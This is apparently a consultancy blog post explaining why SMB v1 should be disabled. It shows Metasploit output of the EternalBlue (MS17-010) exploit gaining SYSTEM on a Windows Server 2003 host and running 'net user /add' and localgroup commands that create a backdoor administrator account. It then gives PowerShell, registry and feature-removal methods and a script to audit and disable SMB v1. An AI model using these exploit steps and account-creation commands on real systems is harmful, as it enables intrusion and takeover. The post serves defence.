Why you should immediately disable SMB v1

22.06.18 03:37 PM By Jordan

TL;DR - Set-SmbServerConfiguration -EnableSMB1Protocol $false

Everyone has heard of the EternalBlue exploit that ran wild in 2017.

This exploit was used to spread ransomware around the world (WannaCry in May 2017, NotPetya a month later) and it caused huge frustration, cost and general panic in the workplace. Even popular TV shows like The Good Wife built episodes around ransomware. All of it hinged on one SMB v1 bug, MS17-010, a flaw in the kernel-mode SMB v1 server, being used to get code execution as SYSTEM, encrypt files and hop to the next machine.

Not safe yet

So, it's June 2018, and you would assume that people have patched and updated their computers and that we are all safe now.

Unfortunately, it is an almost daily occurrence here at GTconsult that our A-Team Protection team finds the easiest and most widespread way into a network is still the EternalBlue SMB v1 exploit.

A lot of our clients still have legacy Windows Server 2003 machines that cannot be retired because of some line-of-business system that cannot be upgraded or moved. In this case we have a Windows Server 2003 3790 Service Pack 2 machine, and the MS17-010 scanner flags it straight away:

10.89.32.4:445 – Host is likely VULNERABLE to MS17-010! – Windows Server 2003 3790 Service Pack 2

msf auxiliary(admin/smb/ms17_010_command) > run

10.89.32.4:445 – Target OS: Windows Server 2003 3790 Service Pack 2
10.89.32.4:445 – Filling barrel with fish… done
10.89.32.4:445 – <—————- | Entering Danger Zone | —————->
10.89.32.4:445 – Preparing dynamite…
10.89.32.4:445 – Trying stick 1 (x64)…Miss
10.89.32.4:445 – Trying stick 2 (x86)…Boom!
10.89.32.4:445 – Successfully Leaked Transaction!
10.89.32.4:445 – Successfully caught Fish-in-a-barrel
10.89.32.4:445 – <—————- | Leaving Danger Zone | —————->
10.89.32.4:445 – Reading from CONNECTION struct at: 0x89a2bad8
10.89.32.4:445 – Built a write-what-where primitive…
10.89.32.4:445 – Overwrite complete… SYSTEM session obtained!
10.89.32.4:445 – Service start timed out, OK if running a command or non-service executable…
10.89.32.4:445 – checking if the file is unlocked
10.89.32.4:445 – Getting the command output…
10.89.32.4:445 – Executing cleanup…
10.89.32.4:445 – Cleanup was successful
10.89.32.4:445 – Command completed successfuly!
10.89.32.4:445 – Output for “net user /add gtconsult SDFGE%YSDFsaf12”:

And there you have it: the command ran as SYSTEM, and we have created a local account called gtconsult on the server (one more command, net localgroup administrators gtconsult /add, puts it in the local Administrators group). We now own the box, all because SMB v1 was not disabled, and from here it is usually a short step to moving laterally to other machines and picking up domain admin credentials.

So how do we stop this from happening?

The best thing to do is disable SMB v1 and here are a few methods on how to do that:

Method 1 – PowerShell (Windows 8 / Server 2012 and later): Set-SmbServerConfiguration -EnableSMB1Protocol $false. This takes effect immediately and needs no reboot. On Windows 7 / Server 2008 R2 the cmdlet does not exist; set the DWORD value SMB1 to 0 under HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters and restart the Server service. Windows Server 2003 only speaks SMB v1 (SMB v2 arrived with Vista / Server 2008), so on a box like the one above "disabling SMB v1" means turning off file sharing altogether; if the machine really must stay, install the MS17-010 update Microsoft released for Server 2003 and firewall TCP 445 so only the few hosts that need it can reach it.

Method 2 – Windows Features

Open Windows Features (Windows 8.1 / Windows 10) and untick SMB 1.0/CIFS File Sharing Support; on Server 2012 R2 and later remove the SMB 1.0/CIFS File Sharing Support feature (FS-SMB1) in Server Manager. This removes both the SMB v1 server and the SMB v1 client and needs a reboot.
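The two methods above rolled into one script, as an added example that is not from the original post: it records the current state, checks for clients still negotiating SMB v1 against this server, disables the SMB v1 server and client, removes the optional feature and verifies that SMB v2 is still on. It assumes Windows 8.1 / Windows 10 or Server 2012 R2 and later with the SmbShare module; the registry value in the comments is the fallback for Windows 7 / Server 2008 R2, and the assumption that SMB v1 sessions report a dialect starting with "1." is marked where it is used.

```powershell
# Added example (not from the original post): audit and disable SMBv1 on a
# Windows 8.1/10 or Server 2012 R2+ host, then verify the result.
# Run from an elevated PowerShell session.
#Requires -RunAsAdministrator

# 1. Record the current state so the change can be reverted if a legacy
#    device (old NAS, scanner, Server 2003 box) turns out to need SMBv1.
$before = Get-SmbServerConfiguration | Select-Object EnableSMB1Protocol, EnableSMB2Protocol
Write-Host "Before: SMB1=$($before.EnableSMB1Protocol) SMB2=$($before.EnableSMB2Protocol)"

# 2. Look for clients that are still talking SMBv1 to this server.
#    Assumption: Get-SmbSession reports SMBv1 sessions with a Dialect
#    string beginning "1." (SMB2/3 sessions report "2.x" / "3.x").
$smb1Sessions = Get-SmbSession -ErrorAction SilentlyContinue |
    Where-Object { ([string]$_.Dialect) -like '1.*' }
if ($smb1Sessions) {
    Write-Warning "Active SMBv1 sessions found; fix these clients before continuing:"
    $smb1Sessions | Select-Object ClientComputerName, ClientUserName, Dialect | Format-Table
}

# 3. Disable the SMBv1 server, the side EternalBlue attacks. Immediate, no reboot.
#    Windows 7 / Server 2008 R2 equivalent (no SmbShare module):
#    Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters `
#        -Name SMB1 -Type DWord -Value 0 ; then restart the LanmanServer service.
Set-SmbServerConfiguration -EnableSMB1Protocol $false -Force

# 4. Disable the SMBv1 client too, so this host cannot be coaxed into an SMBv1
#    connection by a rogue server. Takes effect after a reboot.
sc.exe config lanmanworkstation depend= bowser/mrxsmb20/nsi | Out-Null
sc.exe config mrxsmb10 start= disabled | Out-Null

# 5. Remove the optional feature so nothing re-enables it later.
#    (On Server 2012 R2+ the equivalent is Remove-WindowsFeature FS-SMB1.)
$feature = Get-WindowsOptionalFeature -Online -FeatureName SMB1Protocol -ErrorAction SilentlyContinue
if ($feature -and $feature.State -eq 'Enabled') {
    Disable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol -NoRestart | Out-Null
}

# 6. Verify. SMB2 must stay on, or the server stops serving files entirely.
$after = Get-SmbServerConfiguration
if ($after.EnableSMB1Protocol) { throw "SMBv1 is still enabled on this host" }
if (-not $after.EnableSMB2Protocol) { throw "SMBv2 is off; this host would serve no shares at all" }
Write-Host "After: SMB1=$($after.EnableSMB1Protocol) SMB2=$($after.EnableSMB2Protocol)"
Write-Host "Reboot to complete the client-side change."
```

Before rolling this out across a domain, run the first step only (Get-SmbServerConfiguration via Invoke-Command against the computers from Get-ADComputer) to get a list of hosts still reporting EnableSMB1Protocol as True, and deal with any SMBv1-only devices those hosts serve; the script deliberately warns rather than stops on active SMBv1 sessions, so read the warning before letting it continue.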

Disabling SMB v1 takes EternalBlue off the table, but it is not the whole job: still install MS17-010 rather than relying on one setting, confirm the result with Get-SmbServerConfiguration, and check that nothing on the network (old printers, NAS boxes and those Server 2003 hosts) still depends on SMB v1 before you switch it off everywhere. Happy working!

Jordan
